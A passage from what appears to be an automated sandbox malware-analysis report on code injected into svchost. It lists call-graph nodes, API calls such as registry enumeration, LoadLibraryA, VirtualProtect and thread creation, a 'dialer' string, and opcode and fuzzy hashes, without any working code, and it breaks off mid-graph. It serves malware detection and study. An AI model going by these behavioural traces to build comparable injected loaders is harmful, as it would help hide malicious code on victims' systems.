179537acff3 15040->15041 15045 179537acfd1 ExFilterRethrow 15040->15045 15043 179537ad6cc _invalid_parameter_noinfo HeapFree 15041->15043 15042->15040 15042->15045 15044 179537ad002 15043->15044 15046 179537ad020 FlsSetValue 15044->15046 15047 179537ad010 FlsSetValue 15044->15047 15045->15038 15049 179537ad02c FlsSetValue 15046->15049 15050 179537ad03e 15046->15050 15048 179537ad019 15047->15048 15051 179537ad744 __free_lconv_num HeapFree 15048->15051 15049->15048 15052 179537acb94 _invalid_parameter_noinfo HeapFree 15050->15052 15051->15045 15053 179537ad046 15052->15053 15054 179537ad744 __free_lconv_num HeapFree 15053->15054 15054->15045 15056 179537acb08 15055->15056 15059 179537acd7c 15056->15059 15058 179537acb1e 15058->15035 15060 179537acdc4 Concurrency::details::SchedulerProxy::DeleteThis 15059->15060 15061 179537acd98 Concurrency::details::SchedulerProxy::DeleteThis 15059->15061 15060->15058 15061->15060 15063 179537b07b4 15061->15063 15066 179537b0850 15063->15066 15072 179537b07d7 15063->15072 15064 179537b08a3 15129 179537b0954 15064->15129 15066->15064 15067 179537ad744 __free_lconv_num 5 API calls 15066->15067 15068 179537b0874 15067->15068 15070 179537ad744 __free_lconv_num 5 API calls 15068->15070 15069 179537b0816 15071 179537b0838 15069->15071 15078 179537ad744 __free_lconv_num 5 API calls 15069->15078 15073 179537b0888 15070->15073 15074 179537ad744 __free_lconv_num 5 API calls 15071->15074 15072->15066 15072->15069 15075 179537ad744 __free_lconv_num 5 API calls 15072->15075 15077 179537ad744 __free_lconv_num 5 API calls 15073->15077 15080 179537b0844 15074->15080 15076 179537b080a 15075->15076 15089 179537b2fc8 15076->15089 15083 179537b0897 15077->15083 15084 179537b082c 15078->15084 15079 179537b090e 15085 179537ad744 __free_lconv_num 5 API calls 15080->15085 15081 179537b08af 15081->15079 15086 179537ad744 5 API calls __free_lconv_num 15081->15086 15087 179537ad744 __free_lconv_num 5 API calls 15083->15087 15117 179537b30d4 15084->15117 15085->15066 15086->15081 15087->15064 15090 179537b2fd1 15089->15090 15115 179537b30cc 15089->15115 15091 179537b2feb 15090->15091 15092 179537ad744 __free_lconv_num 5 API calls 15090->15092 15093 179537b2ffd 15091->15093 15094 179537ad744 __free_lconv_num 5 API calls 15091->15094 15092->15091 15095 179537b300f 15093->15095 15096 179537ad744 __free_lconv_num 5 API calls 15093->15096 15094->15093 15097 179537ad744 __free_lconv_num 5 API calls 15095->15097 15099 179537b3021 15095->15099 15096->15095 15097->15099 15098 179537b3033 15100 179537b3045 15098->15100 15102 179537ad744 __free_lconv_num 5 API calls 15098->15102 15099->15098 15101 179537ad744 __free_lconv_num 5 API calls 15099->15101 15103 179537b3057 15100->15103 15104 179537ad744 __free_lconv_num 5 API calls 15100->15104 15101->15098 15102->15100 15105 179537b3069 15103->15105 15106 179537ad744 __free_lconv_num 5 API calls 15103->15106 15104->15103 15107 179537b307b 15105->15107 15108 179537ad744 __free_lconv_num 5 API calls 15105->15108 15106->15105 15109 179537b308d 15107->15109 15110 179537ad744 __free_lconv_num 5 API calls 15107->15110 15108->15107 15111 179537b30a2 15109->15111 15112 179537ad744 __free_lconv_num 5 API calls 15109->15112 15110->15109 15113 179537b30b7 15111->15113 15114 179537ad744 __free_lconv_num 5 API calls 15111->15114 15112->15111 15113->15115 15116 179537ad744 __free_lconv_num 5 API calls 15113->15116 15114->15113 15115->15069 15116->15115 15118 179537b30d9 15117->15118 15127 179537b313a 15117->15127 15119 179537b30f2 15118->15119 15120 179537ad744 __free_lconv_num 5 API calls 15118->15120 15121 179537b3104 15119->15121 15122 179537ad744 __free_lconv_num 5 API calls 15119->15122 15120->15119 15123 179537b3116 15121->15123 15124 179537ad744 __free_lconv_num 5 API calls 15121->15124 15122->15121 15125 179537b3128 15123->15125 15126 179537ad744 __free_lconv_num 5 API calls 15123->15126 15124->15123 15125->15127 15128 179537ad744 __free_lconv_num 5 API calls 15125->15128 15126->15125 15127->15071 15128->15127 15130 179537b0985 15129->15130 15131 179537b0959 15129->15131 15130->15081 15131->15130 15135 179537b3174 15131->15135 15134 179537ad744 __free_lconv_num 5 API calls 15134->15130 15136 179537b097d 15135->15136 15137 179537b317d 15135->15137 15136->15134 15171 179537b3140 15137->15171 15140 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15141 179537b31a6 15140->15141 15142 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15141->15142 15143 179537b31b4 15142->15143 15144 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15143->15144 15145 179537b31c2 15144->15145 15146 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15145->15146 15147 179537b31d1 15146->15147 15148 179537ad744 __free_lconv_num 5 API calls 15147->15148 15149 179537b31dd 15148->15149 15150 179537ad744 __free_lconv_num 5 API calls 15149->15150 15151 179537b31e9 15150->15151 15152 179537ad744 __free_lconv_num 5 API calls 15151->15152 15153 179537b31f5 15152->15153 15154 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15153->15154 15155 179537b3203 15154->15155 15156 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15155->15156 15157 179537b3211 15156->15157 15158 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15157->15158 15159 179537b321f 15158->15159 15160 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15159->15160 15161 179537b322d 15160->15161 15162 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15161->15162 15163 179537b323c 15162->15163 15164 179537ad744 __free_lconv_num 5 API calls 15163->15164 15165 179537b3248 15164->15165 15166 179537ad744 __free_lconv_num 5 API calls 15165->15166 15167 179537b3254 15166->15167 15168 179537ad744 __free_lconv_num 5 API calls 15167->15168 15169 179537b3260 15168->15169 15170 179537ad744 __free_lconv_num 5 API calls 15169->15170 15170->15136 15172 179537b3167 15171->15172 15173 179537b3156 15171->15173 15172->15140 15173->15172 15174 179537ad744 __free_lconv_num 5 API calls 15173->15174 15174->15173 15176 179537aebfb 15175->15176 15177 179537aec05 15176->15177 15178 179537ad744 __free_lconv_num 5 API calls 15176->15178 15179 179537ae99d 15177->15179 15180 179537acefc 10 API calls 15177->15180 15178->15177 15183 179537ae668 15179->15183 15181 179537aeccc 15180->15181 15182 179537ae968 45 API calls 15181->15182 15182->15179 15217 179537ae1b4 15183->15217 15186 179537ae688 GetOEMCP 15188 179537ae6af 15186->15188 15187 179537ae69a 15187->15188 15189 179537ae69f GetACP 15187->15189 15188->15010 15190 179537aca0c 15188->15190 15189->15188 15193 179537aca1b _invalid_parameter_noinfo 15190->15193 15191 179537ad6ac __free_lconv_num 5 API calls 15192 179537aca55 15191->15192 15192->15013 15192->15015 15193->15191 15193->15192 15195 179537ae668 17 API calls 15194->15195 15196 179537aed39 15195->15196 15197 179537aed76 IsValidCodePage 15196->15197 15203 179537aee8f 15196->15203 15204 179537aed90 15196->15204 15199 179537aed87 15197->15199 15197->15203 15201 179537aedb6 GetCPInfo 15199->15201 15199->15204 15200 179537aead5 15200->15018 15200->15023 15201->15203 15201->15204 15291 179537a7940 15203->15291 15280 179537ae780 15204->15280 15207 179537ae4b4 15205->15207 15206 179537ad6ac __free_lconv_num 5 API calls 15208 179537ae550 15206->15208 15207->15206 15210 179537ae4e1 15207->15210 15376 179537ad570 15208->15376 15211 179537ad6ac __free_lconv_num 5 API calls 15210->15211 15214 179537ae593 15210->15214 15212 179537ae5f1 15211->15212 15213 179537ad570 _invalid_parameter_noinfo 28 API calls 15212->15213 15213->15214 15215 179537ae62d 15214->15215 15216 179537ad744 __free_lconv_num 5 API calls 15214->15216 15215->15027 15216->15215 15218 179537ae1d8 15217->15218 15219 179537ae1d3 15217->15219 15218->15219 15225 179537ace28 15218->15225 15219->15186 15219->15187 15221 179537ae1f3 15260 179537b03fc 15221->15260 15226 179537ace3d __vcrt_InitializeCriticalSectionEx 15225->15226 15227 179537ace4c FlsGetValue 15226->15227 15228 179537ace69 FlsSetValue 15226->15228 15229 179537ace63 15227->15229 15242 179537ace59 ExFilterRethrow 15227->15242 15230 179537ace7b 15228->15230 15228->15242 15229->15228 15231 179537ad6cc _invalid_parameter_noinfo 5 API calls 15230->15231 15232 179537ace8a 15231->15232 15233 179537acea8 FlsSetValue 15232->15233 15234 179537ace98 FlsSetValue 15232->15234 15235 179537aceb4 FlsSetValue 15233->15235 15236 179537acec6 15233->15236 15238 179537acea1 15234->15238 15235->15238 15239 179537acb94 _invalid_parameter_noinfo 5 API calls 15236->15239 15237 179537acee2 15237->15221 15240 179537ad744 __free_lconv_num 5 API calls 15238->15240 15241 179537acece 15239->15241 15240->15242 15243 179537ad744 __free_lconv_num 5 API calls 15241->15243 15242->15237 15244 179537acf28 FlsSetValue 15242->15244 15245 179537acf0d FlsGetValue 15242->15245 15243->15242 15246 179537acf35 15244->15246 15249 179537acf1a 15244->15249 15247 179537acf22 15245->15247 15245->15249 15248 179537ad6cc _invalid_parameter_noinfo 5 API calls 15246->15248 15247->15244 15250 179537acf44 15248->15250 15249->15221 15251 179537acf62 FlsSetValue 15250->15251 15252 179537acf52 FlsSetValue 15250->15252 15254 179537acf80 15251->15254 15255 179537acf6e FlsSetValue 15251->15255 15253 179537acf5b 15252->15253 15256 179537ad744 __free_lconv_num 5 API calls 15253->15256 15257 179537acb94 _invalid_parameter_noinfo 5 API calls 15254->15257 15255->15253 15256->15249 15258 179537acf88 15257->15258 15259 179537ad744 __free_lconv_num 5 API calls 15258->15259 15259->15249 15261 179537b0411 15260->15261 15263 179537ae216 15260->15263 15261->15263 15268 179537b0a5c 15261->15268 15264 179537b0468 15263->15264 15265 179537b047d 15264->15265 15267 179537b0490 15264->15267 15265->15267 15277 179537aecf0 15265->15277 15267->15219 15269 179537ace28 _invalid_parameter_noinfo 15 API calls 15268->15269 15270 179537b0a6b 15269->15270 15272 179537b0aa4 15270->15272 15273 179537b0acc 15270->15273 15272->15263 15274 179537b0aeb 15273->15274 15275 179537b0ade Concurrency::details::SchedulerProxy::DeleteThis 15273->15275 15274->15272 15275->15274 15276 179537b07b4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15275->15276 15276->15274 15278 179537ace28 _invalid_parameter_noinfo 15 API calls 15277->15278 15279 179537aecf9 15278->15279 15281 179537ae7bd GetCPInfo 15280->15281 15290 179537ae8b3 15280->15290 15287 179537ae7d0 15281->15287 15281->15290 15282 179537a7940 _log10_special 3 API calls 15284 179537ae952 15282->15284 15284->15203 15298 179537b1544 15287->15298 15290->15282 15292 179537a7949 15291->15292 15293 179537a7954 15292->15293 15294 179537a812c IsProcessorFeaturePresent 15292->15294 15293->15200 15295 179537a8144 15294->15295 15372 179537a8320 RtlCaptureContext 15295->15372 15297 179537a8157 15297->15200 15299 179537ae1b4 15 API calls 15298->15299 15300 179537b1586 15299->15300 15318 179537af07c 15300->15318 15319 179537af085 MultiByteToWideChar 15318->15319 15373 179537a833a capture_previous_context 15372->15373 15374 179537a8389 15373->15374 15375 179537a8350 RtlVirtualUnwind 15373->15375 15374->15297 15375->15373 15375->15374 15379 179537ad408 15376->15379 15380 179537ad433 15379->15380 15387 179537ad4a4 15380->15387 15382 179537ad45a 15383 179537ad47d 15382->15383 15395 179537ac7a0 15382->15395 15385 179537ad492 15383->15385 15386 179537ac7a0 _invalid_parameter_noinfo 18 API calls 15383->15386 15385->15210 15386->15385 15406 179537ad1ec 15387->15406 15389 179537ad4ce _invalid_parameter_noinfo 15390 179537ad4df _invalid_parameter_noinfo 15389->15390 15410 179537ad590 IsProcessorFeaturePresent 15389->15410 15390->15382 15396 179537ac7f8 15395->15396 15397 179537ac7af __vcrt_InitializeCriticalSectionEx 15395->15397 15396->15383 15398 179537ad068 _invalid_parameter_noinfo 8 API calls 15397->15398 15399 179537ac7de ExFilterRethrow 15398->15399 15399->15396 15400 179537ac7a0 _invalid_parameter_noinfo 18 API calls 15399->15400 15401 179537ac827 15400->15401 15438 179537b0430 15401->15438 15407 179537ad208 __vcrt_InitializeCriticalSectionEx 15406->15407 15409 179537ad233 ExFilterRethrow 15406->15409 15415 179537ad068 15407->15415 15409->15389 15411 179537ad5a3 15410->15411 15429 179537ad2a4 15411->15429 15413 179537ad5be _invalid_parameter_noinfo 15414 179537ad5c4 TerminateProcess 15413->15414 15416 179537ad087 FlsGetValue 15415->15416 15417 179537ad09c 15415->15417 15416->15417 15418 179537ad094 15416->15418 15417->15418 15419 179537ad6cc _invalid_parameter_noinfo 5 API calls 15417->15419 15418->15409 15420 179537ad0be 15419->15420 15421 179537ad0dc FlsSetValue 15420->15421 15425 179537ad0cc 15420->15425 15422 179537ad0e8 FlsSetValue 15421->15422 15423 179537ad0fa 15421->15423 15422->15425 15424 179537acb94 _invalid_parameter_noinfo 5 API calls 15423->15424 15426 179537ad102 15424->15426 15427 179537ad744 __free_lconv_num 5 API calls 15425->15427 15428 179537ad744 __free_lconv_num 5 API calls 15426->15428 15427->15418 15428->15418 15430 179537ad2de _invalid_parameter_noinfo 15429->15430 15431 179537ad306 RtlCaptureContext 15430->15431 15432 179537ad33b capture_previous_context 15431->15432 15433 179537ad376 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15432->15433 15434 179537ad340 RtlVirtualUnwind 15432->15434 15435 179537ad3c8 _invalid_parameter_noinfo 15433->15435 15434->15433 15436 179537a7940 _log10_special 3 API calls 15435->15436 15437 179537ad3e7 15436->15437 15437->15413 15439 179537b0449 15438->15439 15440 179537ac84f 15438->15440 15439->15440 15441 179537b0a5c _invalid_parameter_noinfo 15 API calls 15439->15441 15442 179537b049c 15440->15442 15441->15440 15443 179537b04b5 15442->15443 15444 179537ac85f 15442->15444 15443->15444 15445 179537aecf0 _invalid_parameter_noinfo 15 API calls 15443->15445 15444->15383 15445->15444 15447 179537ac6ff 15446->15447 15448 179537ac6f5 15446->15448 15449 179537ad6ac __free_lconv_num 5 API calls 15447->15449 15448->15447 15453 179537ac71a 15448->15453 15450 179537ac706 15449->15450 15451 179537ad570 _invalid_parameter_noinfo 28 API calls 15450->15451 15452 179537ac712 15451->15452 15452->14984 15453->15452 15454 179537ad6ac __free_lconv_num 5 API calls 15453->15454 15454->15450 15456 179537ac26d 15455->15456 15460 179537ac225 15455->15460 15457 179537ac296 15456->15457 15458 179537ad744 __free_lconv_num 5 API calls 15456->15458 15459 179537ad744 __free_lconv_num 5 API calls 15457->15459 15458->15456 15459->15460 15460->14982 15461 1795377273c 15463 1795377276a 15461->15463 15462 17953772858 LoadLibraryA 15462->15463 15463->15462 15464 179537728d4 15463->15464 15465 179537a1abc 15470 179537a1628 GetProcessHeap 15465->15470 15467 179537a1ad2 Sleep SleepEx 15468 179537a1acb 15467->15468 15468->15467 15469 179537a1598 StrCmpIW StrCmpW 15468->15469 15469->15468 15471 179537a1648 _invalid_parameter_noinfo 15470->15471 15515 179537a1268 GetProcessHeap 15471->15515 15473 179537a1650 15474 179537a1268 2 API calls 15473->15474 15475 179537a1661 15474->15475 15476 179537a1268 2 API calls 15475->15476 15477 179537a166a 15476->15477 15478 179537a1268 2 API calls 15477->15478 15479 179537a1673 15478->15479 15480 179537a168e RegOpenKeyExW 15479->15480 15481 179537a18a6 15480->15481 15482 179537a16c0 RegOpenKeyExW 15480->15482 15481->15468 15483 179537a16e9 15482->15483 15484 179537a16ff RegOpenKeyExW 15482->15484 15519 179537a12bc RegQueryInfoKeyW 15483->15519 15485 179537a1723 15484->15485 15486 179537a173a RegOpenKeyExW 15484->15486 15530 179537a104c RegQueryInfoKeyW 15485->15530 15489 179537a1775 RegOpenKeyExW 15486->15489 15490 179537a175e 15486->15490 15494 179537a1799 15489->15494 15495 179537a17b0 RegOpenKeyExW 15489->15495 15493 179537a12bc 13 API calls 15490->15493 15496 179537a176b RegCloseKey 15493->15496 15497 179537a12bc 13 API calls 15494->15497 15498 179537a17d4 15495->15498 15499 179537a17eb RegOpenKeyExW 15495->15499 15496->15489 15502 179537a17a6 RegCloseKey 15497->15502 15503 179537a12bc 13 API calls 15498->15503 15500 179537a1826 RegOpenKeyExW 15499->15500 15501 179537a180f 15499->15501 15505 179537a1861 RegOpenKeyExW 15500->15505 15506 179537a184a 15500->15506 15504 179537a104c 5 API calls 15501->15504 15502->15495 15507 179537a17e1 RegCloseKey 15503->15507 15508 179537a181c RegCloseKey 15504->15508 15510 179537a1885 15505->15510 15511 179537a189c RegCloseKey 15505->15511 15509 179537a104c 5 API calls 15506->15509 15507->15499 15508->15500 15512 179537a1857 RegCloseKey 15509->15512 15513 179537a104c 5 API calls 15510->15513 15511->15481 15512->15505 15514 179537a1892 RegCloseKey 15513->15514 15514->15511 15536 179537b6168 15515->15536 15517 179537a1283 GetProcessHeap 15518 179537a12ae _invalid_parameter_noinfo 15517->15518 15518->15473 15520 179537a1327 GetProcessHeap 15519->15520 15521 179537a148a RegCloseKey 15519->15521 15525 179537a133e _invalid_parameter_noinfo 15520->15525 15521->15484 15522 179537a1352 RegEnumValueW 15522->15525 15523 179537a1476 GetProcessHeap HeapFree 15523->15521 15525->15522 15525->15523 15526 179537a13d3 GetProcessHeap 15525->15526 15527 179537a141e lstrlenW GetProcessHeap 15525->15527 15528 179537a13f3 GetProcessHeap HeapFree 15525->15528 15529 179537a1443 StrCpyW 15525->15529 15537 179537a152c 15525->15537 15526->15525 15527->15525 15528->15527 15529->15525 15531 179537a11b5 RegCloseKey 15530->15531 15534 179537a10bf _invalid_parameter_noinfo 15530->15534 15531->15486 15532 179537a10cf RegEnumValueW 15532->15534 15533 179537a114e GetProcessHeap 15533->15534 15534->15531 15534->15532 15534->15533 15535 179537a116e GetProcessHeap HeapFree 15534->15535 15535->15534 15538 179537a157c 15537->15538 15541 179537a1546 15537->15541 15538->15525 15539 179537a1565 StrCmpW 15539->15541 15540 179537a155d StrCmpIW 15540->15541 15541->15538 15541->15539 15541->15540

                                                        Executed Functions

                                                        Function 00000179537A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: e4bf16918a7cacbca0db979268ad85abf1fead3538016a29a4f8caa0c503e4bd
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 6AE06D35A0161886EB058F62D82838A37F1FB8AF0AF04C024CA8D47351EF7D8499C750
                                                        Function 00000179537AF1EC Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                        • String ID:
                                                        • API String ID: 3331406755-0
                                                        • Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                        • Instruction ID: e89af08d413403d6e5d7482309db2184f3715486d0e1cd70b0b3824db1cad727
                                                        • Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                        • Instruction Fuzzy Hash: 4C31B431A6876081EA269F226C502DE77B4B786BD8F48422BEA9E43BC5DF38C5458704
                                                        Function 00000179537A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ca808a076cef636c667c28671c52d662c11ceeea05346f25545d2e4f9369c430
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 5F116130E3C66482FB629FB1F8557D923B4E76A34DF544127DA4E42B91EF78C04C8610
                                                        Function 00000179537A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                          • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                        • Sleep.KERNEL32 ref: 00000179537A1AD7
                                                        • SleepEx.KERNELBASE ref: 00000179537A1ADD
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b6c2e1d6c864596a4c04fdf18bbbf5071076cb135f023add6302ffefab344da2
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 04313271F2866582FF529B36DA413E923F4AB46BC8F8854239E0D873D5FF24C859C610
                                                        Function 00000179537A3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 89 179537a3844-179537a384f 90 179537a3851-179537a3864 StrCmpNIW 89->90 91 179537a3869-179537a3870 89->91 90->91 92 179537a3866 90->92 92->91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: dbbf6158d5080c7e4a12ec2d32b33ddd1bdad48742ffa41caff3c02827982d81
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 7AD0A770B252558BFF56DFE688D46E02370EB0974CF884032C90802750EB1CD98DA720
                                                        Function 000001795377273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 93 1795377273c-179537727a4 call 179537729d4 * 4 102 179537727aa-179537727ad 93->102 103 179537729b2 93->103 102->103 104 179537727b3-179537727b6 102->104 105 179537729b4-179537729d0 103->105 104->103 106 179537727bc-179537727bf 104->106 106->103 107 179537727c5-179537727e6 106->107 107->103 109 179537727ec-1795377280c 107->109 110 1795377280e-17953772836 109->110 111 17953772838-1795377283f 109->111 110->110 110->111 112 179537728df-179537728e6 111->112 113 17953772845-17953772852 111->113 115 179537728ec-17953772901 112->115 116 17953772992-179537729b0 112->116 113->112 114 17953772858-1795377286a LoadLibraryA 113->114 117 1795377286c-17953772878 114->117 118 179537728ca-179537728d2 114->118 115->116 119 17953772907 115->119 116->105 120 179537728c5-179537728c8 117->120 118->114 121 179537728d4-179537728d9 118->121 123 1795377290d-17953772921 119->123 120->118 124 1795377287a-1795377287d 120->124 121->112 125 17953772923-17953772934 123->125 126 17953772982-1795377298c 123->126 129 1795377287f-179537728a5 124->129 130 179537728a7-179537728b7 124->130 127 1795377293f-17953772943 125->127 128 17953772936-1795377293d 125->128 126->116 126->123 133 1795377294d-17953772951 127->133 134 17953772945-1795377294b 127->134 132 17953772970-17953772980 128->132 135 179537728ba-179537728c1 129->135 130->135 132->125 132->126 136 17953772963-17953772967 133->136 137 17953772953-17953772961 133->137 134->132 135->120 136->132 139 17953772969-1795377296c 136->139 137->132 139->132
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: aa063f8f75c6740ade699a4d29bdcc33ceee5f26798b0015945cd0de14dc5192
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: E6613532F096A087DB56CF15D0007ADB3F2F756BA8F188122CE6D17788DA38D866DB00

                                                        Non-executed Functions

                                                        Function 00000179537A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 399 179537a2b2c-179537a2ba5 call 179537c2ce0 402 179537a2bab-179537a2bb1 399->402 403 179537a2ee0-179537a2f03 399->403 402->403 404 179537a2bb7-179537a2bba 402->404 404->403 405 179537a2bc0-179537a2bc3 404->405 405->403 406 179537a2bc9-179537a2bd9 GetModuleHandleA 405->406 407 179537a2bdb-179537a2beb call 179537b6090 406->407 408 179537a2bed 406->408 409 179537a2bf0-179537a2c0e 407->409 408->409 409->403 413 179537a2c14-179537a2c33 StrCmpNIW 409->413 413->403 414 179537a2c39-179537a2c3d 413->414 414->403 415 179537a2c43-179537a2c4d 414->415 415->403 416 179537a2c53-179537a2c5a 415->416 416->403 417 179537a2c60-179537a2c73 416->417 418 179537a2c83 417->418 419 179537a2c75-179537a2c81 417->419 420 179537a2c86-179537a2c8a 418->420 419->420 421 179537a2c8c-179537a2c98 420->421 422 179537a2c9a 420->422 423 179537a2c9d-179537a2ca7 421->423 422->423 424 179537a2d9d-179537a2da1 423->424 425 179537a2cad-179537a2cb0 423->425 428 179537a2ed2-179537a2eda 424->428 429 179537a2da7-179537a2daa 424->429 426 179537a2cc2-179537a2ccc 425->426 427 179537a2cb2-179537a2cbf call 179537a199c 425->427 431 179537a2d00-179537a2d0a 426->431 432 179537a2cce-179537a2cdb 426->432 427->426 428->403 428->417 433 179537a2dbb-179537a2dc5 429->433 434 179537a2dac-179537a2db8 call 179537a199c 429->434 439 179537a2d0c-179537a2d19 431->439 440 